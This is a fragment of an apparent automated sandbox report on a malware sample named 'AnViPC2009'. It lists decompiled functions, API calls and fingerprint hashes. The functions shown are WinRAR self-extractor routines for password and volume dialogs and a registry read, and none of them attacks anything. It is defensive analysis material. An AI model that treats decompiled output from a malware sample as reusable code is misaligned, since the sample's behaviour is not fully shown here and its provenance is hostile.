                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$File$System$Local
                                                                                                                                                      • String ID: @A
                                                                                                                                                      • API String ID: 2859370177-361999007
                                                                                                                                                      • Opcode ID: adf7c2f7cc2eb2dd66c139f7d906b26c70349401397584d72f501528abe1a243
                                                                                                                                                      • Instruction ID: f7a1b3028853772f18daed3c9b345ebae55ea64eca81d075197798a516cfa776
                                                                                                                                                      • Opcode Fuzzy Hash: adf7c2f7cc2eb2dd66c139f7d906b26c70349401397584d72f501528abe1a243
                                                                                                                                                      • Instruction Fuzzy Hash: 30212CB59002199BCB60DFAAC8408FFFBF9FE48701B10492BE586E3640E378D554CB64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                                      			E0040B3B3(void* __ecx, void* __edx, struct HWND__* _a4, intOrPtr _a8, signed short _a12, CHAR* _a16) {
                                                                                                                                                      				void* _t9;
                                                                                                                                                      				void* _t16;
                                                                                                                                                      				void* _t19;
                                                                                                                                                      				intOrPtr _t21;
                                                                                                                                                      				struct HWND__* _t26;
                                                                                                                                                      				CHAR* _t27;
                                                                                                                                                      
                                                                                                                                                      				_t27 = _a16;
                                                                                                                                                      				_t26 = _a4;
                                                                                                                                                      				E00403059(__edx, _t26, _a8, _a12, _t27, "ASKNEXTVOL", 0, 0);
                                                                                                                                                      				_t9 = _a8 - 0x110;
                                                                                                                                                      				if(_t9 == 0) {
                                                                                                                                                      					 *0x41f324 = _t27;
                                                                                                                                                      					_push(_t27);
                                                                                                                                                      					L12:
                                                                                                                                                      					SetDlgItemTextA(_t26, 0x65, ??);
                                                                                                                                                      					L13:
                                                                                                                                                      					return 1;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t9 != 1) {
                                                                                                                                                      					L5:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t16 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                      				if(_t16 == 0) {
                                                                                                                                                      					GetDlgItemTextA(_t26, 0x65,  *0x41f324, 0x400);
                                                                                                                                                      					_push(1);
                                                                                                                                                      					L9:
                                                                                                                                                      					EndDialog(_t26, ??);
                                                                                                                                                      					goto L13;
                                                                                                                                                      				}
                                                                                                                                                      				_t19 = _t16 - 1;
                                                                                                                                                      				if(_t19 == 0) {
                                                                                                                                                      					_push(0);
                                                                                                                                                      					goto L9;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t19 == 0x64) {
                                                                                                                                                      					_t21 = E004073B4( *0x41f324);
                                                                                                                                                      					if(E00402810(_t26, E004098D0(0x7b),  *0x41f324, _t21, 0) == 0) {
                                                                                                                                                      						goto L13;
                                                                                                                                                      					}
                                                                                                                                                      					_push( *0x41f324);
                                                                                                                                                      					goto L12;
                                                                                                                                                      				}
                                                                                                                                                      				goto L5;
                                                                                                                                                      			}









                                                                                                                                                      0x0040b3b7
                                                                                                                                                      0x0040b3bb
                                                                                                                                                      0x0040b3cf
                                                                                                                                                      0x0040b3d7
                                                                                                                                                      0x0040b3dc
                                                                                                                                                      0x0040b445
                                                                                                                                                      0x0040b44b
                                                                                                                                                      0x0040b44c
                                                                                                                                                      0x0040b44f
                                                                                                                                                      0x0040b455
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b457
                                                                                                                                                      0x0040b3df
                                                                                                                                                      0x0040b3f0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b3f0
                                                                                                                                                      0x0040b3e5
                                                                                                                                                      0x0040b3e6
                                                                                                                                                      0x0040b43b
                                                                                                                                                      0x0040b441
                                                                                                                                                      0x0040b424
                                                                                                                                                      0x0040b425
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b425
                                                                                                                                                      0x0040b3e8
                                                                                                                                                      0x0040b3e9
                                                                                                                                                      0x0040b422
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b422
                                                                                                                                                      0x0040b3ee
                                                                                                                                                      0x0040b3fc
                                                                                                                                                      0x0040b418
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b41a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b41a
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemText$Dialog
                                                                                                                                                      • String ID: ASKNEXTVOL
                                                                                                                                                      • API String ID: 1770891597-3402441367
                                                                                                                                                      • Opcode ID: 18bcb60c88717f8ae067db0437e97dd1ccc9c733cbe48cde6d31b5fb1c87f75f
                                                                                                                                                      • Instruction ID: 33502fc4e3c774c2891e7e54ec09dfb759c41af6b3abb37e780b579720e66abe
                                                                                                                                                      • Opcode Fuzzy Hash: 18bcb60c88717f8ae067db0437e97dd1ccc9c733cbe48cde6d31b5fb1c87f75f
                                                                                                                                                      • Instruction Fuzzy Hash: A911A032140108BADB116F959D09FBB3B68EB05B01F108036BB00B51D3C3B99922E7AD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 004027A1
                                                                                                                                                      • SHBrowseForFolderA.SHELL32(?,?), ref: 004027DC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BrowseFolderMalloc
                                                                                                                                                      • String ID: A
                                                                                                                                                      • API String ID: 3812826013-3554254475
                                                                                                                                                      • Opcode ID: 536474bc935bf22df2b89972fbf85ec52f79c940274fa63940bbf5dc9eb7fe8a
                                                                                                                                                      • Instruction ID: 07f9a62c01355bfa8b2fe6d81470485e8e781270ab6e07938e1ed113a1b24fa7
                                                                                                                                                      • Opcode Fuzzy Hash: 536474bc935bf22df2b89972fbf85ec52f79c940274fa63940bbf5dc9eb7fe8a
                                                                                                                                                      • Instruction Fuzzy Hash: C0016D76900219AFCF10CFA4C948BEF77F8AF49311F104566E805E7280D778CA158BA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                                      			E0040B1EC(struct HWND__* _a4, intOrPtr _a8, signed short _a12, CHAR* _a16) {
                                                                                                                                                      				void* _t10;
                                                                                                                                                      				void* _t17;
                                                                                                                                                      				void* _t21;
                                                                                                                                                      				struct HWND__* _t22;
                                                                                                                                                      
                                                                                                                                                      				_t22 = _a4;
                                                                                                                                                      				E00403059(_t21, _t22, _a8, _a12, _a16, "GETPASSWORD1", 0, 0);
                                                                                                                                                      				_t10 = _a8 - 0x110;
                                                                                                                                                      				if(_t10 == 0) {
                                                                                                                                                      					SetDlgItemTextA(_t22, 0x66, _a16);
                                                                                                                                                      					L9:
                                                                                                                                                      					return 1;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t10 != 1) {
                                                                                                                                                      					L4:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t17 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                      				if(_t17 == 0) {
                                                                                                                                                      					GetDlgItemTextA(_t22, 0x65, 0x419ee8, 0x80);
                                                                                                                                                      					_push(1);
                                                                                                                                                      					L6:
                                                                                                                                                      					EndDialog(_t22, ??);
                                                                                                                                                      					goto L9;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t17 == 1) {
                                                                                                                                                      					_push(0);
                                                                                                                                                      					goto L6;
                                                                                                                                                      				}
                                                                                                                                                      				goto L4;
                                                                                                                                                      			}







                                                                                                                                                      0x0040b1f0
                                                                                                                                                      0x0040b206
                                                                                                                                                      0x0040b20e
                                                                                                                                                      0x0040b213
                                                                                                                                                      0x0040b24e
                                                                                                                                                      0x0040b254
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b256
                                                                                                                                                      0x0040b216
                                                                                                                                                      0x0040b222
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b222
                                                                                                                                                      0x0040b21c
                                                                                                                                                      0x0040b21d
                                                                                                                                                      0x0040b23e
                                                                                                                                                      0x0040b244
                                                                                                                                                      0x0040b228
                                                                                                                                                      0x0040b229
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b229
                                                                                                                                                      0x0040b220
                                                                                                                                                      0x0040b226
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b226
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemText$Dialog
                                                                                                                                                      • String ID: GETPASSWORD1
                                                                                                                                                      • API String ID: 1770891597-3292211884
                                                                                                                                                      • Opcode ID: bf0d03eac6e9e68a650a97090f55db646eabfd77957b11add9493460e6de1b82
                                                                                                                                                      • Instruction ID: 727e386470d6b7359cf29fdd46d7f12e96c628ad1092937243739836d42877c7
                                                                                                                                                      • Opcode Fuzzy Hash: bf0d03eac6e9e68a650a97090f55db646eabfd77957b11add9493460e6de1b82
                                                                                                                                                      • Instruction Fuzzy Hash: 1DF0AF32280219BADB21AF90AC09FFF3614EF05741F008426FB01F90D0C7BA996097AE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040B989(void* __esi, intOrPtr _a4) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				int _v12;
                                                                                                                                                      				int _v16;
                                                                                                                                                      				char _v1040;
                                                                                                                                                      				char _v2064;
                                                                                                                                                      				long _t13;
                                                                                                                                                      
                                                                                                                                                      				if( *0x419f90 != 0) {
                                                                                                                                                      					E0040B8DA( &_v1040, _a4);
                                                                                                                                                      					_t13 = RegOpenKeyExA(0x80000001, "Software\\WinRAR SFX", 0, 1,  &_v8);
                                                                                                                                                      					if(_t13 == 0) {
                                                                                                                                                      						_v12 = 0x400;
                                                                                                                                                      						if(RegQueryValueExA(_v8,  &_v1040, 0,  &_v16,  &_v2064,  &_v12) == 0) {
                                                                                                                                                      							E0040A450(_a4,  &_v2064);
                                                                                                                                                      						}
                                                                                                                                                      						return RegCloseKey(_v8);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t13;
                                                                                                                                                      			}









                                                                                                                                                      0x0040b999
                                                                                                                                                      0x0040b9a5
                                                                                                                                                      0x0040b9bc
                                                                                                                                                      0x0040b9c5
                                                                                                                                                      0x0040b9e2
                                                                                                                                                      0x0040b9f1
                                                                                                                                                      0x0040b9fd
                                                                                                                                                      0x0040b9fd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ba05
                                                                                                                                                      0x0040b9c5
                                                                                                                                                      0x0040ba0c

                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\WinRAR SFX,00000000,00000001,0000000C,?,00000022), ref: 0040B9BC
                                                                                                                                                      • RegQueryValueExA.ADVAPI32(0000000C,?,00000000,00000000,?,?), ref: 0040B9E9
                                                                                                                                                      • RegCloseKey.ADVAPI32(0000000C), ref: 0040BA05
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                      • String ID: Software\WinRAR SFX
                                                                                                                                                      • API String ID: 3677997916-754673328
                                                                                                                                                      • Opcode ID: 19f740545e227c547a251f79ce2109e0e7da7a0d7633267ff09baeccc2603ac4
                                                                                                                                                      • Instruction ID: 3f23dcb504f6c7536a58f760981765d7b3fa3855f42e25cd05d4780c02d3a9c9
                                                                                                                                                      • Opcode Fuzzy Hash: 19f740545e227c547a251f79ce2109e0e7da7a0d7633267ff09baeccc2603ac4
                                                                                                                                                      • Instruction Fuzzy Hash: 0C01EC75500109FAEB11DB90DD45FDE7BBCEB04348F5081A2BB05F10A0D7B49A59DBAD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                      			E00409688(void* __ecx) {
                                                                                                                                                      				char _v1028;
                                                                                                                                                      				struct HINSTANCE__* _t5;
                                                                                                                                                      				struct HRSRC__* _t6;
                                                                                                                                                      				signed int _t10;
                                                                                                                                                      				char _t12;
                                                                                                                                                      				void* _t16;
                                                                                                                                                      
                                                                                                                                                      				_t16 = __ecx;
                                                                                                                                                      				_t5 = GetModuleHandleA(0);
                                                                                                                                                      				_t17 = "RTL";
                                                                                                                                                      				_t6 = FindResourceA(_t5, "RTL", 5);
                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                      					E0040952C(_t16, "LTR",  &_v1028, 1, "LTR");
                                                                                                                                                      					_t10 = E0040A4C2( &_v1028, _t17);
                                                                                                                                                      					asm("sbb al, al");
                                                                                                                                                      					_t12 =  ~_t10 + 1;
                                                                                                                                                      					 *((char*)(_t16 + 0x10)) = _t12;
                                                                                                                                                      					return _t12;
                                                                                                                                                      				}
                                                                                                                                                      				 *((char*)(_t16 + 0x10)) = 1;
                                                                                                                                                      				return _t6;
                                                                                                                                                      			}









                                                                                                                                                      0x00409695
                                                                                                                                                      0x00409697
                                                                                                                                                      0x0040969f
                                                                                                                                                      0x004096a6
                                                                                                                                                      0x004096ae
                                                                                                                                                      0x004096c8
                                                                                                                                                      0x004096d5
                                                                                                                                                      0x004096dc
                                                                                                                                                      0x004096de
                                                                                                                                                      0x004096e0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004096e0
                                                                                                                                                      0x004096b0
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,00414C88), ref: 00409697
                                                                                                                                                      • FindResourceA.KERNEL32(00000000,RTL,00000005), ref: 004096A6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FindHandleModuleResource
                                                                                                                                                      • String ID: LTR$RTL
                                                                                                                                                      • API String ID: 3537982541-719208805
                                                                                                                                                      • Opcode ID: b0e78cae33823b620977f423fd0db6685158b71de1a57790fd83f1c0403f4661
                                                                                                                                                      • Instruction ID: eb84699a9ebcd1787519a0d4571ceb08e559b90d308b3ad9be416bd68c0d2478
                                                                                                                                                      • Opcode Fuzzy Hash: b0e78cae33823b620977f423fd0db6685158b71de1a57790fd83f1c0403f4661
                                                                                                                                                      • Instruction Fuzzy Hash: 43F0B4716002147AD71066758C0AFEB2A5CDB41704F04057AB709E21C2DBF89A95C7A9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00406CAF(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                      				struct _WNDCLASSEXA _v52;
                                                                                                                                                      				short _t17;
                                                                                                                                                      				intOrPtr* _t18;
                                                                                                                                                      				intOrPtr _t21;
                                                                                                                                                      
                                                                                                                                                      				_t21 = _a4;
                                                                                                                                                      				_t18 = __ecx;
                                                                                                                                                      				_v52.cbSize = 0x30;
                                                                                                                                                      				_v52.style = 0x828;
                                                                                                                                                      				_v52.lpfnWndProc = E00406C31;
                                                                                                                                                      				_v52.cbClsExtra = 0;
                                                                                                                                                      				_v52.cbWndExtra = 0;
                                                                                                                                                      				_v52.hInstance = _t21;
                                                                                                                                                      				_v52.hIcon = 0;
                                                                                                                                                      				_v52.hCursor = LoadCursorA(0, 0x7f00);
                                                                                                                                                      				_v52.hbrBackground = 6;
                                                                                                                                                      				_v52.lpszMenuName = 0;
                                                                                                                                                      				_v52.lpszClassName = "RarHtmlClassName";
                                                                                                                                                      				_v52.hIconSm = 0;
                                                                                                                                                      				_t17 = RegisterClassExA( &_v52);
                                                                                                                                                      				 *_t18 = _t21;
                                                                                                                                                      				return _t17;
                                                                                                                                                      			}







                                                                                                                                                      0x00406cb7
                                                                                                                                                      0x00406cc3
                                                                                                                                                      0x00406cc5
                                                                                                                                                      0x00406ccc
                                                                                                                                                      0x00406cd3
                                                                                                                                                      0x00406cda
                                                                                                                                                      0x00406cdd
                                                                                                                                                      0x00406ce0
                                                                                                                                                      0x00406ce3
                                                                                                                                                      0x00406cec
                                                                                                                                                      0x00406cf3
                                                                                                                                                      0x00406cfa
                                                                                                                                                      0x00406cfd
                                                                                                                                                      0x00406d04
                                                                                                                                                      0x00406d07
                                                                                                                                                      0x00406d0e
                                                                                                                                                      0x00406d13

                                                                                                                                                      APIs
                                                                                                                                                      • LoadCursorA.USER32 ref: 00406CE6
                                                                                                                                                      • RegisterClassExA.USER32(00000030), ref: 00406D07
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClassCursorLoadRegister
                                                                                                                                                      • String ID: (%A$0
                                                                                                                                                      • API String ID: 1693014935-102169129
                                                                                                                                                      • Opcode ID: b2e9a1e5582e37f7e6eb68226a8fb8fef6e9efa7671efadf11aee8d60acbb0af
                                                                                                                                                      • Instruction ID: cf071cc3fa9d71f7334cf3661a386cb64a2fa6f4ae35defbaf1d69bb54971268
                                                                                                                                                      • Opcode Fuzzy Hash: b2e9a1e5582e37f7e6eb68226a8fb8fef6e9efa7671efadf11aee8d60acbb0af
                                                                                                                                                      • Instruction Fuzzy Hash: 72F0B6B1D11218ABDB019FD9D9445DEFBF8FF59304F10805BE500B7250C7B816158FA9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040B282(CHAR* _a8, char _a12) {
                                                                                                                                                      				char _v4100;
                                                                                                                                                      				char* _t7;
                                                                                                                                                      				void* _t13;
                                                                                                                                                      				long _t17;
                                                                                                                                                      
                                                                                                                                                      				_t7 = E00401200(0x1000);
                                                                                                                                                      				if( *0x419f78 == 0) {
                                                                                                                                                      					_t7 = _a8;
                                                                                                                                                      					if( *_t7 != 0) {
                                                                                                                                                      						_t17 = GetLastError();
                                                                                                                                                      						_t2 =  &_a12; // 0x405524
                                                                                                                                                      						wvsprintfA( &_v4100, _a8, _t2);
                                                                                                                                                      						_t13 = E0040AE33(0x4122e8,  &_v4100);
                                                                                                                                                      						if(_t17 != 0) {
                                                                                                                                                      							SetLastError(_t17);
                                                                                                                                                      						}
                                                                                                                                                      						return _t13;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t7;
                                                                                                                                                      			}







                                                                                                                                                      0x0040b28a
                                                                                                                                                      0x0040b296
                                                                                                                                                      0x0040b298
                                                                                                                                                      0x0040b29e
                                                                                                                                                      0x0040b2a7
                                                                                                                                                      0x0040b2a9
                                                                                                                                                      0x0040b2b7
                                                                                                                                                      0x0040b2c9
                                                                                                                                                      0x0040b2d2
                                                                                                                                                      0x0040b2d5
                                                                                                                                                      0x0040b2d5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b2db
                                                                                                                                                      0x0040b29e
                                                                                                                                                      0x0040b2dd

                                                                                                                                                      APIs
                                                                                                                                                      • GetLastError.KERNEL32(00414C7C,?,004032B5,00000000,00000000,00000076,?,00000000,00404F68,00000017,00000000,00000000,00405470,?), ref: 0040B2A1
                                                                                                                                                      • wvsprintfA.USER32(?,?,$U@), ref: 0040B2B7
                                                                                                                                                        • Part of subcall function 0040AE33: wvsprintfA.USER32(?,?,?), ref: 0040AE54
                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,004032B5,00000000,00000000,00000076,?,00000000,00404F68,00000017,00000000,00000000,00405470,?), ref: 0040B2D5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLastwvsprintf
                                                                                                                                                      • String ID: $U@
                                                                                                                                                      • API String ID: 2157943386-1897258927
                                                                                                                                                      • Opcode ID: d391b88f515a35b3e87bcca2f0aea1a2c18b4a1e5f912cd449dcf2cdc037324f
                                                                                                                                                      • Instruction ID: 30691480426cebebafc6dae7b5d85055ca5b8c6d57f7dc118ad4b386da44dbcc
                                                                                                                                                      • Opcode Fuzzy Hash: d391b88f515a35b3e87bcca2f0aea1a2c18b4a1e5f912cd449dcf2cdc037324f
                                                                                                                                                      • Instruction Fuzzy Hash: 5CF05E32404219AFDB129B64DC48BEE37A8EB05355F0440AAF805E62D0D7B89A958B9D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                      			E0040AC7A(signed int _a4) {
                                                                                                                                                      				signed int _t4;
                                                                                                                                                      				signed int _t10;
                                                                                                                                                      				struct HDC__* _t13;
                                                                                                                                                      
                                                                                                                                                      				if( *0x41f318 == 0) {
                                                                                                                                                      					_t13 = GetDC(0);
                                                                                                                                                      					if(_t13 != 0) {
                                                                                                                                                      						 *0x41f318 = GetDeviceCaps(_t13, 0x58);
                                                                                                                                                      						ReleaseDC(0, _t13);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t4 =  *0x41f318; // 0x60
                                                                                                                                                      				asm("cdq");
                                                                                                                                                      				_t10 = 0x60;
                                                                                                                                                      				return _t4 * _a4 / _t10;
                                                                                                                                                      			}






                                                                                                                                                      0x0040ac81
                                                                                                                                                      0x0040ac8c
                                                                                                                                                      0x0040ac90
                                                                                                                                                      0x0040ac9e
                                                                                                                                                      0x0040aca3
                                                                                                                                                      0x0040aca3
                                                                                                                                                      0x0040aca9
                                                                                                                                                      0x0040acaa
                                                                                                                                                      0x0040acb6
                                                                                                                                                      0x0040acb7
                                                                                                                                                      0x0040acba

                                                                                                                                                      APIs
                                                                                                                                                      • GetDC.USER32(00000000), ref: 0040AC86
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0040AC95
                                                                                                                                                      • ReleaseDC.USER32 ref: 0040ACA3
                                                                                                                                                      Strings
                                                                                                                                                      • C:\Users\user\Desktop\Endermanch@AnViPC2009.exe, xrefs: 0040AC83
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
